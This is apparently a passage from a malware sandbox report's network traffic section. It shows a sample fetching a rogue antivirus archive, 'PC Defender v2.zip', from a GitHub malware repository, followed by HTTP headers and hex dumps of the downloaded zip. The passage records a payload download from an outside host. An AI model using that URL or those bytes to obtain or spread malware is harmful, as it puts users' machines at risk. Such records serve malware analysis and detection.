                                                                                                                                                    2022-09-29 12:59:18 UTC27953INData Raw: f3 dd b9 4c 43 38 ed 2d b9 9f 23 ca ae 36 db 44 01 ec 59 9a e9 2a b9 5f 13 76 6b 2e b4 29 30 fd bb 57 39 8a 47 e2 bf e5 99 97 e5 c7 df 13 91 5c ed 25 71 b5 35 23 21 24 6c 4b 6e 86 f4 96 6b c4 d8 71 82 e6 4d 7e 8e b3 b8 5d 90 e0 bb a0 17 90 70 a2 7c 1b 17 9a d3 72 d9 a7 e5 78 0a 0c 96 bb 11 d8 4d 4e 21 65 41 ed 89 a3 e4 14 85 f7 5b 16 8a dc c2 3c 89 ef 60 8e 83 e1 7d 8b b8 88 bb 34 8a 2a 8a 01 9d 64 c3 a4 d1 0a 2e 74 8e fc a3 0a ea 4a 51 73 20 b2 74 95 27 81 9b 66 42 4c 11 e7 b0 b6 66 f6 42 04 5a da 4b dd 79 ba de 96 e3 0a 85 b8 86 93 22 c2 e1 64 b9 79 68 b5 f1 84 f6 bd 50 2b 40 c5 2f e5 fb f2 52 b1 bb a3 75 7c 9d a5 8f 93 2e f2 e5 85 85 7f 31 3c e9 33 7d 85 28 0a f9 22 03 e3 f5 f3 89 1f 93 3e 6b 48 4e cb fb 32 b5 a9 2c 82 b4 23 83 1b 07 20 8f 0c 63 11 b2
                                                                                                                                                    Data Ascii: LC8-#6DY*_vk.)0W9G\%q5#!$lKnkqM~]p|rxMN!eA[<`}4*d.tJQs t'fBLfBZKy"dyhP+@/Ru|.1<3}(">kHN2,# c
                                                                                                                                                    2022-09-29 12:59:18 UTC27964INData Raw: b7 c2 d6 c2 96 61 d9 78 d0 94 74 38 2d df da 2e 6c 5d 7e 12 ec 74 e8 cb 41 24 b8 24 b1 c8 6a 61 5a f7 fc ea ec b6 b2 33 21 6d c1 35 91 c3 f8 e4 2c e7 7a c7 41 00 ff ab c3 59 f0 57 c6 c2 1a a0 b6 59 5d 1b c6 a8 5c 1a 01 2b 20 09 59 63 5b 60 4f 95 47 01 d5 09 72 b6 d4 e3 a6 3f 98 83 a4 79 ea 33 1f d2 8b 37 88 6f 98 cd c1 40 25 af 11 34 7a f1 b7 cc 33 04 55 5f a7 f9 b9 4a ad 2b a5 6c 2a 6c b8 e8 3f a2 de b0 fd fe 82 c5 43 e1 db e1 60 7c be f1 1b d1 14 93 23 4e a9 6c 4b 3e a3 1d db 1e 59 50 e4 37 cb f7 51 cf 09 44 63 de a0 e9 65 e0 cb 9c 3e a8 b5 68 3b 43 58 0c 11 b7 d4 fe f2 64 3a ca 4c 0f e0 b7 c9 c0 ae 05 b0 17 53 e0 c7 ea a3 c3 be 56 96 b9 72 8f 9e 53 81 ad 03 61 bb 49 c8 a5 5e ec de 44 19 07 85 a2 bb 73 60 75 b0 db 36 58 41 1f f9 1e eb ca 26 a8 7c 14 5d
                                                                                                                                                    Data Ascii: axt8-.l]~tA$$jaZ3!m5,zAYWY]\+ Yc[`OGr?y37o@%4z3U_J+l*l?C`|#NlK>YP7QDce>h;CXd:LSVrSaI^Ds`u6XA&|]
                                                                                                                                                    2022-09-29 12:59:18 UTC27980INData Raw: a1 55 b7 0c fe 87 24 0d 85 a9 21 4d 49 67 fe 67 b8 d1 8d 31 9e 42 a0 cd 03 e9 2a 9a 40 b4 55 8c ae 98 3e 46 58 f0 00 74 18 fc 1c 2a 89 c6 58 6a 0b a0 57 5c ef c4 1d 75 68 cf 44 b1 9e b7 0f c3 b2 09 c7 b5 9c 00 44 45 be d8 1f d6 c0 1b a2 ea 16 7e b6 85 0f 6b 4a e7 e4 e0 20 f6 69 a4 bb f6 6c 8e 06 c3 57 58 33 53 0c d1 a8 fe 67 04 45 7a 6b 50 a1 45 3a cc a5 7a dc 83 b4 34 a7 6b 92 42 12 19 9b c9 25 16 4d 79 33 04 fd 02 da 62 37 fc 61 00 dc 8f 2d b0 36 9b a2 0f fc 26 a2 ba bc dd 74 6a d2 9b b0 b8 5f 3a 44 5e bc 60 7f cf 1e c9 cd ae d2 40 89 3e ee 3d ba 35 0c 5f b3 f6 76 74 6d f2 29 16 21 37 db 9f c2 8b 8b 79 54 6a c9 f3 14 11 f6 da 1e 5b bc 15 3d c0 89 33 1c 61 43 5a 30 55 ff fc 53 b5 86 5e 82 27 76 ab ed c6 2b f6 2a fc 6c da bc 6b 55 b6 87 7a 7c bb 14 8c 74
                                                                                                                                                    Data Ascii: U$!MIgg1B*@U>FXt*XjW\uhDDE~kJ ilWX3SgEzkPE:z4kB%My3b7a-6&tj_:D^`@>=5_vtm)!7yTj[=3aCZ0US^'v+*lkUz|t


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    105192.168.2.349760140.82.121.3443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:19 UTC27981OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/PC%20Defender%20v2.zip HTTP/1.1
                                                                                                                                                    Host: github.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    106140.82.121.3443192.168.2.349760C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:19 UTC27981INHTTP/1.1 302 Found
                                                                                                                                                    Server: GitHub.com
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:57:24 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                    Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/PC%20Defender%20v2.zip
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                    2022-09-29 12:59:19 UTC27982INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    107192.168.2.349761185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:19 UTC27983OUTGET /Endermanch/MalwareDatabase/master/rogues/PC%20Defender%20v2.zip HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    108185.199.108.133443192.168.2.349761C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:19 UTC27983INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 808324
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                    ETag: "90d2402923439bff69b4e2e4b61840f4f4c22bfbc0155d3f83cead22bcfa0c94"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-GitHub-Request-Id: 080D:3F36:6EE7E0:7C68D4:6335935F
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:59:19 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-mxp6940-MXP
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    X-Cache-Hits: 1
                                                                                                                                                    X-Timer: S1664456359.460576,VS0,VE161
                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Fastly-Request-ID: da35c77e2cd99267e223935d0b52ca959af4ae79
                                                                                                                                                    Expires: Thu, 29 Sep 2022 13:04:19 GMT
                                                                                                                                                    Source-Age: 0
                                                                                                                                                    2022-09-29 12:59:19 UTC27984INData Raw: 50 4b 03 04 14 00 01 00 08 00 01 80 27 3d a2 81 68 5d c8 54 0c 00 00 72 0d 00 1b 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 50 43 44 65 66 65 6e 64 65 72 76 32 2e 6d 73 69 71 b1 84 80 41 51 cc d0 29 e8 26 1a a1 f7 36 a5 a0 21 85 13 da c5 46 48 db f2 9f d7 a0 76 93 0a 9c a8 f0 6f bc b6 86 4d 3a d3 a1 ea c3 86 e8 02 f6 47 b1 64 3e 6f 27 f0 a9 af 57 e0 69 a0 cc 64 0e eb ff f2 c3 75 e0 5c f8 07 90 9f 7b 02 41 1c a6 8e 14 07 db 43 99 c8 6a e6 f5 37 b2 d4 53 3a ee c8 02 50 2e c7 27 fa 7f 2b 27 9c 20 85 35 b7 9a d3 49 be 57 e1 5b 00 c0 16 6d 5f 4f b3 9c a2 d3 3d 31 2a bd c1 5a c8 e1 b9 53 61 b5 e1 41 a0 17 fa a0 fc 4b cc 34 cf 11 9a 15 ea 82 d1 10 6b 5b 47 ca fb 79 eb 19 68 6f 77 dc 0a 6e a9 85 14 07 44 d9 78 4e d9 d5 ed ce 2e 9c 4c 72 33 55 32 bd 47 8c 1e 6b 36
                                                                                                                                                    Data Ascii: PK'=h]TrEndermanch@PCDefenderv2.msiqAQ)&6!FHvoM:Gd>o'Widu\{ACj7S:P.'+' 5IW[m_O=1*ZSaAK4k[GyhownDxN.Lr3U2Gk6
                                                                                                                                                    2022-09-29 12:59:19 UTC28000INData Raw: df 05 2a 4b 12 6a 18 f2 bd 4a 3e ac 0d be b5 9a 55 00 91 a2 df a8 77 5e e2 bc 2f c2 cd 95 d5 0d b6 d9 c1 0b d0 2e 76 94 c7 28 01 ad 70 fb 8d 65 b0 b5 f7 08 d0 7b fa 3e bd c1 67 46 1f cc 27 c0 f6 5c 41 1b 5b 5b 30 88 2c 52 00 60 fe d3 a3 e9 70 94 c2 70 70 b7 81 69 15 f8 68 e6 fa 59 1b ba 25 7f 11 c7 76 4f 5f 69 06 b8 41 46 3c d0 d2 51 d6 fa 6a c2 80 71 76 da 62 73 2a 59 31 dc 26 32 06 42 f7 b3 ef 99 6e 3e ad 4b 93 f4 ae fb 83 86 69 fd 11 b2 ca eb 2e b5 0b d9 78 f1 37 1f e6 76 1e b9 59 cd 68 83 bf 66 ba 0a aa 45 ed 2d 98 0b 7f a4 23 de b8 df 64 31 05 c3 bc 4b dc 70 12 7c e4 6b 23 22 bd 12 f6 35 c7 33 8d 09 eb b5 cb 7d 72 ca ac 93 8e e1 22 1a 6c f4 0b 16 06 94 1c 84 ae 19 fa eb 16 98 7b 2f 02 79 49 86 b0 4b c6 04 98 23 e6 08 49 2a a2 b9 87 b1 e6 f4 9d 6f 9d
                                                                                                                                                    Data Ascii: *KjJ>Uw^/.v(pe{>gF'\A[[0,R`pppihY%vO_iAF<Qjqvbs*Y1&2Bn>Ki.x7vYhfE-#d1Kp|k#"53}r"l{/yIK#I*o
                                                                                                                                                    2022-09-29 12:59:19 UTC28016INData Raw: 91 b4 1b e1 be c8 75 a4 3f d9 eb cd b6 54 1f cb dd 66 ea 92 91 16 87 cf 9a 03 19 08 a0 d2 48 9c 06 78 71 67 3f 9c d2 2c a2 62 fa 06 cc ff a6 39 1f d2 6d df 11 ea c2 05 6c 36 89 f2 73 6b 00 4a a9 5a 2a b3 e5 28 4d c7 d5 60 e8 e3 14 fe 08 e6 d9 20 3f be 3e cd 5a 1c 77 23 1c dc 7a b7 44 78 57 c8 76 2d 5a 34 26 fb 41 33 76 e3 3b 48 14 35 e7 ac 13 39 ad 38 79 31 80 85 63 b3 ac 4a 38 57 bc c8 fb 72 8e 11 d5 65 11 31 80 28 3e 39 1a 2d 63 aa 2b 78 2e 46 ba 07 e5 61 93 66 87 0c 85 80 e2 ca b1 b2 12 9e fc 03 3e c7 a9 43 c0 f6 6f c6 37 77 66 41 43 3b ba 72 ba b2 84 d0 1c a4 23 2e 80 a5 ce 27 d6 61 22 49 25 b0 e6 94 9c e7 c5 83 d9 36 d1 51 3a 08 ad 4a fe 50 8f e5 d9 2d 19 fe d5 41 a2 31 96 76 e6 b5 1f e3 91 83 cf ea 03 0f 0e 46 90 c0 3a ce c3 7c 4a 48 fc 62 6f f0 f3
                                                                                                                                                    Data Ascii: u?TfHxqg?,b9ml6skJZ*(M` ?>Zw#zDxWv-Z4&A3v;H598y1cJ8Wre1(>9-c+x.Faf>Co7wfAC;r#.'a"I%6Q:JP-A1vF:|JHbo
                                                                                                                                                    2022-09-29 12:59:19 UTC28032INData Raw: 3a 8b fc 30 69 96 74 d8 1a 32 d9 40 08 ca 6a 7a f3 2c f6 c9 a8 4b 6d 98 cf 6c 8c ba e4 6f d0 d3 39 34 68 51 36 58 aa 31 ff a2 e1 fd 9f f6 63 d4 ae 71 a5 a1 40 5a c9 9a bb 8e f9 a5 c5 91 79 5d 49 e0 7a c5 16 af 92 40 b3 af ef 1e 70 42 b2 07 6f 24 d1 d7 22 25 0e ce 20 64 62 1e 61 c9 ea 81 af 17 6a bf a0 74 fb b3 32 fc e2 27 20 a0 a7 51 77 f3 ed ed f7 42 01 a8 69 6a 3a b6 67 1c e7 67 48 bb b0 e6 4b f3 ff da de 8b aa 68 b8 e6 52 9e 66 7e 16 45 74 b2 25 12 3b bc ee f0 a4 d3 74 b2 24 5b 37 c7 9e 74 3f 7c aa 5f de 7d a6 08 88 e7 d4 5e 6c 16 4e c0 35 55 72 6b 9f ae c2 13 2c b0 fd 4a 91 60 07 f4 c1 03 7e 06 47 70 eb b4 17 d9 13 c9 c8 3a d4 06 60 1d 81 f4 67 08 c6 5d 5e 11 6d a1 2f f0 e1 2a 8e 3b 92 63 d5 ab 13 d8 74 2e 4f e1 11 ff 6a fc e8 bc cc 1f 47 3c 27 db 67
                                                                                                                                                    Data Ascii: :0it2@jz,Kmlo94hQ6X1cq@Zy]Iz@pBo$"% dbajt2' QwBij:ggHKhRf~Et%;t$[7t?|_}^lN5Urk,J`~Gp:`g]^m/*;ct.OjG<'g
                                                                                                                                                    2022-09-29 12:59:19 UTC28048INData Raw: 73 82 0a 3e ee 36 52 44 e6 fd 9f 31 01 e7 80 e1 8a 74 9c 89 9c 19 44 8d c3 ba 8b 51 a5 fe ee 49 13 b3 c2 70 03 8b 69 2e a3 1b 96 b8 58 06 31 e0 0a fc 01 e6 3e af 74 ca 94 20 fb ef 5d 27 4f da 38 10 13 12 b9 e2 23 b6 ab 06 42 e8 b6 40 ba 2a 39 74 0b b4 ff d6 bb 5a 94 80 6f 44 18 7a ad 02 28 7a f7 4c eb b8 d5 84 42 cc 1a 4a 0c 02 81 b9 90 57 27 d6 01 ab ad 0b 9a 5e b6 41 70 f7 20 85 3c 0a 9c ee 28 78 66 47 20 d8 29 93 09 37 85 6f 31 51 45 ab 11 fd 63 9f 34 25 dc 71 c4 4c 06 e4 fd 52 7a 76 95 3a d5 38 a3 90 83 a3 94 81 a5 b8 51 d5 02 58 16 4e af d8 77 c9 32 4f 16 ac ff 9d f5 fd 30 b1 9e 8c 37 5f 39 1e 31 ee d9 2c 9c 4c c0 75 7c 1a 74 c7 dc 1c db e3 23 f9 7c db f8 47 c1 12 26 5c 2d ed 09 68 09 ad 20 54 f5 4e 7d 69 a1 c8 3b 5b e2 74 38 8d 71 3f a1 e8 4b 1f f1
                                                                                                                                                    Data Ascii: s>6RD1tDQIpi.X1>t ]'O8#B@*9tZoDz(zLBJW'^Ap <(xfG )7o1QEc4%qLRzv:8QXNw2O07_91,Lu|t#|G&\-h TN}i;[t8q?K
                                                                                                                                                    2022-09-29 12:59:19 UTC28064INData Raw: 32 de 7b 79 46 63 e8 56 fb f2 60 1f 8d 70 0f 04 f8 11 1f 92 d7 a5 3d b3 06 9c 12 75 78 ef ca c7 03 bd 06 34 be 6e e2 ef 15 e0 df d9 f1 78 3c a5 f7 5a 11 b7 cc ff 2d 2a d4 a7 c9 26 e3 73 00 8e 76 a4 ea 2a 4c b6 3d dc 05 41 23 e4 21 86 e0 23 4f 66 82 fc f6 6c 18 78 3c f2 14 5a f1 a9 d9 8f 40 dc ed 12 52 40 16 c5 0a 82 10 53 5b 09 9f 02 2c 9f f5 1f 17 b5 94 19 a7 f0 0a d0 c3 60 90 40 72 f6 34 e9 a1 48 7a 38 04 f4 69 e6 f9 e4 dd f9 a1 1e ef 22 95 ba d2 1a 85 8f 2e 3c d9 77 5a 2e 14 4e 97 e7 cd 75 15 e2 bb 8a cb 8a 0d b9 f3 00 c8 3b 93 d6 86 d0 8f ee 7d 3d a9 ec cb c1 87 85 77 fd 4c 85 dd b8 90 d5 ca 58 cf f3 ac 94 1c a4 f2 76 31 cf 78 9f ff 03 a0 73 14 3c 6c 2e 0d 60 e5 e8 f1 43 93 c6 db 3e 94 3c 51 2a d3 46 9c 22 d4 da 79 96 ae 35 4e 44 d0 dd e6 d5 5b 73 81
                                                                                                                                                    Data Ascii: 2{yFcV`p=ux4nx<Z-*&sv*L=A#!#Oflx<Z@R@S[,`@r4Hz8i".<wZ.Nu;}=wLXv1xs<l.`C><Q*F"y5ND[s
                                                                                                                                                    2022-09-29 12:59:19 UTC28080INData Raw: fa 1a ba 46 29 00 c2 61 c6 5b f2 9d d7 9c 37 eb 55 21 6f 0b 94 e2 fc 8c 28 6d d1 23 70 ff 68 1a f7 f2 a2 9d bd 4a 38 2f 5f 12 75 74 52 c8 09 d4 fc 42 65 d8 84 a1 e6 79 b7 ed 09 1a a5 ab c3 86 28 9d fb 82 6d c0 79 d9 0e 03 64 51 43 1d b8 97 89 74 54 2a 02 ef 59 d1 43 b4 46 ac 39 4a 79 dd fe 70 60 cd f5 17 e7 f3 8d 75 3a 37 83 5f 10 7a a0 85 b5 61 31 9c 5f ae b3 48 8d 40 37 4b ef a5 ae ee bb 78 9c 99 cb 19 e1 58 cb 2a 13 7b c8 e9 3e c8 3d b0 8d d0 8a bf 9b c7 5c 08 1a 72 42 70 03 f2 c0 6f e6 55 03 2e 8e 29 84 09 cb 01 5f cd 70 52 f9 3c 8d 0a 72 27 69 85 3f a4 fe 26 fc 66 f3 2d 2e 74 91 9f 06 b6 41 4c 17 43 ba 2a fc a7 17 92 52 59 16 a2 ab 17 8c 67 d4 40 ee eb 5e 61 31 0b 0c 1f c6 de e0 a6 ea ad 69 94 78 f1 40 19 2c 60 98 aa f5 71 77 12 43 68 0e 64 ff f7 73
                                                                                                                                                    Data Ascii: F)a[7U!o(m#phJ8/_utRBey(mydQCtT*YCF9Jyp`u:7_za1_H@7KxX*{>=\rBpoU.)_pR<r'i?&f-.tALC*RYg@^a1ix@,`qwChds
                                                                                                                                                    2022-09-29 12:59:19 UTC28096INData Raw: 0f e3 c6 73 aa 74 30 95 19 27 f9 bc de 43 82 29 ba 50 aa fb 52 7b 00 2c 7c 69 17 a8 09 b9 77 43 f9 45 2f bf a1 9b d0 58 b5 84 00 57 9f c2 0a 6f 72 ae 79 04 47 0c 92 0a 78 90 81 c2 9f 82 ec 02 14 b5 4c 80 f3 6b eb ca ca ef 09 c0 c3 da 39 ce 6a 43 5e ad 0d 3d a2 cd a9 b6 5b c7 ed fb fa 63 23 03 1b 3d 63 af 7a c6 1c a0 46 8a e5 b9 9b e7 aa 85 16 75 09 55 b2 79 87 84 4b fe 63 c7 8a f3 4f 67 ce 0a b4 71 b1 ac ae ef 2a 27 9e ee 04 08 7e e5 3a 06 f8 7a 09 26 75 b7 31 1f b2 16 13 3b 1a a4 2e 7e d0 d1 25 59 cf 66 26 92 a7 4d 2b 3f 3b ae a4 8c e0 da 79 06 43 d5 e7 8a a2 b9 e2 08 da 93 3b 6a cf 7e ae e0 73 7a d3 88 74 43 d6 4c 4c a3 d5 93 71 c7 53 5d fb e9 94 44 0d a1 94 38 a8 1c 38 78 c6 e0 65 98 2e 78 f9 e5 3b d7 17 0b 07 02 84 94 4f 90 81 69 21 a8 a2 06 e7 81 9c
                                                                                                                                                    Data Ascii: st0'C)PR{,|iwCE/XWoryGxLk9jC^=[c#=czFuUyKcOgq*'~:z&u1;.~%Yf&M+?;yC;j~sztCLLqS]D88xe.x;Oi!
                                                                                                                                                    2022-09-29 12:59:19 UTC28112INData Raw: e1 b0 70 6d b4 60 93 16 72 4d 4f d3 85 65 9f 07 96 57 b5 c3 af 91 78 a3 b4 eb 90 60 e9 82 d1 d4 c6 68 07 da b6 48 0e eb d5 b0 a0 61 95 46 a1 29 d6 d0 b8 d8 b9 80 dd d9 d4 ae 77 6c 30 a8 6a 61 36 07 dd ae 3d 7d 83 a1 b4 2d f0 15 ef 84 01 26 14 59 bb 52 2d 3b 55 3e 5d 1e fd 26 fd e1 8b 38 47 16 e4 e5 de f8 e1 76 5d 47 d6 05 a0 af d9 16 b7 dd 44 45 02 82 a9 0e 6f 1c dd 30 bf 67 59 b9 a8 b7 76 67 9e 93 af ce 96 7c a9 ed 5c 28 75 8f 02 15 bf 56 c1 28 8d 2a 23 9e c5 2d 8c e4 d1 b8 fb 3c 12 13 82 7a cd 5f 65 0e 8a eb e7 cf 71 23 9e 02 b8 e2 e0 31 3c de 2e 83 21 8b 9d dc 90 9e eb 1f 60 ef 67 33 c1 66 de e6 c9 cb 26 b9 1a d1 60 c4 7c 46 13 37 4c 71 52 1c 1a 4d f0 1d d4 0a 94 e5 f9 cd 90 02 99 b2 07 63 8c 0e fc 74 21 15 0e ef d8 3c 4d 6e 26 39 3f 81 96 61 ac b1 f8
                                                                                                                                                    Data Ascii: pm`rMOeWx`hHaF)wl0ja6=}-&YR-;U>]&8Gv]GDEo0gYvg|\(uV(*#-<z_eq#1<.!`g3f&`|F7LqRMct!<Mn&9?a
                                                                                                                                                    2022-09-29 12:59:19 UTC28128INData Raw: 12 88 e9 b9 3c 77 eb 25 1a 49 29 8b a2 b0 c6 30 5b 56 30 81 d1 77 e8 71 b9 55 a0 a4 00 41 70 4f 05 7c 65 7e 1e af 5b 81 cd e2 f0 29 13 c8 42 65 31 5b ff ef 91 19 c6 c6 65 46 31 d4 6b a9 6b 75 1a 82 9a e9 6a 8c 72 a1 c2 58 8b 15 dc 20 d9 0e 4a 61 79 b6 1f d6 28 f1 c7 01 96 ca e5 5e 8a 81 cf 14 df 3c 06 92 b8 78 95 06 cf b5 c0 30 d7 19 90 e2 8a ae 9b 1a 88 32 0f 86 7e 81 2a 2a a8 a1 fc 75 3b 68 ff b3 93 ac 8c 60 16 c5 ff e5 07 a3 ed 69 2e 3b 5a ee 6e 7e f2 4e 64 14 53 49 e8 4b 57 51 84 49 8e 80 21 f6 65 d2 14 84 fc 2d 76 31 06 98 79 a5 65 57 84 c5 69 bb a4 b8 c0 d8 9c 57 59 da 9a c6 60 56 42 0a 63 d1 a5 90 0a 17 4d 6f 5a 1b 26 1c a2 a2 ca 17 eb 02 db 85 0e a4 88 56 da ec f3 65 3f d4 95 95 8d 98 d4 cd 41 98 a1 c3 b0 2e 73 f4 3d 25 07 9a f9 dd e8 5f 6c 20 55
                                                                                                                                                    Data Ascii: <w%I)0[V0wqUApO|e~[)Be1[eF1kkujrX Jay(^<x02~**u;h`i.;Zn~NdSIKWQI!e-v1yeWiWY`VBcMoZ&Ve?A.s=%_l U
                                                                                                                                                    2022-09-29 12:59:19 UTC28144INData Raw: e9 91 0a 00 4c 9b e2 6a a6 91 ef 15 25 dd c7 9f 50 79 93 eb 10 c4 8a bb 92 c8 d6 ca dc 50 e4 b6 a5 be 4b 99 9f 40 be 67 ab 80 cb ad 40 90 e0 86 ad c2 06 23 64 4d f0 dc 82 12 13 1f f1 51 3e 9d 37 c3 b4 4c 72 6f 54 d8 1e e3 2c e9 a5 63 6a 3e 5d ad d8 58 29 33 b3 99 e5 4b 19 5d 02 a0 78 0a 70 de c3 ac 5e ac 62 e6 45 15 0a 14 91 45 61 82 2b f9 a7 5e 56 1b ac d5 8b b2 96 c8 d8 a5 a5 91 db 98 96 47 ed ea 9e c5 07 bd fc 69 12 3c 20 ba 97 60 6d 06 33 bd 11 44 c2 fd 04 10 ee 44 d8 aa 4c c0 7a 97 6a 47 af f2 ce 2f bb b6 36 7e 04 f3 48 1d a5 63 74 09 07 be 5a d0 64 f7 54 a8 25 07 01 0a d6 7f c3 e4 f1 db 25 75 a3 b1 bc 6a 1d be 9d 85 72 55 17 94 82 09 11 98 db b5 04 6b 42 1b 4f 3a ba ce 9d 96 94 14 1d 0a 7b 3d 52 93 8a 74 7b 75 3b 3f f2 5f d6 7a 13 62 d5 bc 7b f1 ef
                                                                                                                                                    Data Ascii: Lj%PyPK@g@#dMQ>7LroT,cj>]X)3K]xp^bEEa+^VGi< `m3DDLzjG/6~HctZdT%%ujrUkBO:{=Rt{u;?_zb{
                                                                                                                                                    2022-09-29 12:59:19 UTC28160INData Raw: c2 a3 c0 7d a5 7f 3c e7 a2 38 64 e8 06 ae 18 a1 00 e0 43 d1 71 65 bb d5 07 87 61 33 04 64 8b 12 5e 24 8d f2 9e 52 98 b8 02 c1 de ef 21 a0 be 2b c2 89 c9 e6 9d 2c 91 e8 a2 b3 56 35 ca 6c 82 d8 cc bf 93 f8 7c d0 6d 52 83 24 42 dc ac ec f9 89 af cf e3 6e 6d 98 cc a7 24 2e 90 d9 2a 1c 74 b9 38 05 fb e6 cc 99 77 72 2d b5 0c 2c f6 01 da ee 6b 22 ae f4 30 2c f9 79 cd 56 99 33 2a 59 e7 20 d4 ad a6 e9 fb a8 d2 d7 9f 48 30 66 59 51 f6 a7 7f f3 01 e4 09 5c 44 6f a1 9a 33 dd 94 26 79 86 d6 30 1f cf ba 83 cd ee 4f 4f 3c cb 10 ec 49 3b 9f 32 d3 1b c0 6c 47 3c af e4 03 62 45 98 17 41 28 97 83 e8 cc 55 1d b1 6d 3f 74 c6 ad fb 3a 03 eb 6d ba 02 94 d5 cb 1a 1f 65 d0 ab 5a 33 74 05 96 9c 91 a9 f4 be b6 de 5a a4 53 1b 9a 6c 0b 0a 22 91 a4 be f4 ba 6a 71 e2 40 d9 e8 53 22 82
                                                                                                                                                    Data Ascii: }<8dCqea3d^$R!+,V5l|mR$Bnm$.*t8wr-,k"0,yV3*Y H0fYQ\Do3&y0OO<I;2lG<bEA(Um?t:meZ3tZSl"jq@S"
                                                                                                                                                    2022-09-29 12:59:19 UTC28176INData Raw: 67 a2 c5 9b da e7 eb d8 5d 2f 6c 4b 41 1e 49 9f ed 10 27 aa bc 20 f0 75 27 e4 de 1a d0 2d 61 a0 de 04 ea 4f 69 2f e3 f9 8e f0 8f e5 51 89 f4 cb 0d b1 1c 4c 66 97 3e c9 ea a3 cd ea 13 9d 72 60 e2 b2 c6 db 6e c5 af 58 3d 8d 33 a7 d3 61 ea 8c ba da 4e bb 18 e4 46 37 f1 42 28 1a 07 9d c7 8d c7 28 9f 8d 7d ca a3 55 af 93 74 0b ef 6e de f0 32 3c f7 58 77 5b 1e c1 27 f3 de e7 f4 8b d2 76 7d a9 b2 e8 5c e3 00 06 8c 1f a9 66 a2 9a 1e a7 fd 8d 5b 02 ea 92 9d 16 e8 75 fc 3d 2a 8e 42 49 47 08 f9 c0 7a d1 87 c6 33 70 c8 28 44 70 b2 2a 03 6f d7 50 d3 a3 55 5e 34 dc c1 97 d6 98 00 43 5e 63 7f d3 04 3f 5d a0 46 e8 37 00 91 ab 97 f0 e6 5b 75 86 6a a9 08 5e f6 8f bb 05 e6 9b 82 69 da f9 04 26 5b 55 44 ba a4 50 a4 e5 a2 c5 ab 1a c8 eb cf 75 99 fc 9d d2 06 fc b6 a4 7a 8a 54
                                                                                                                                                    Data Ascii: g]/lKAI' u'-aOi/QLf>r`nX=3aNF7B((}Utn2<Xw['v}\f[u=*BIGz3p(Dp*oPU^4C^c?]F7[uj^i&[UDPuzT
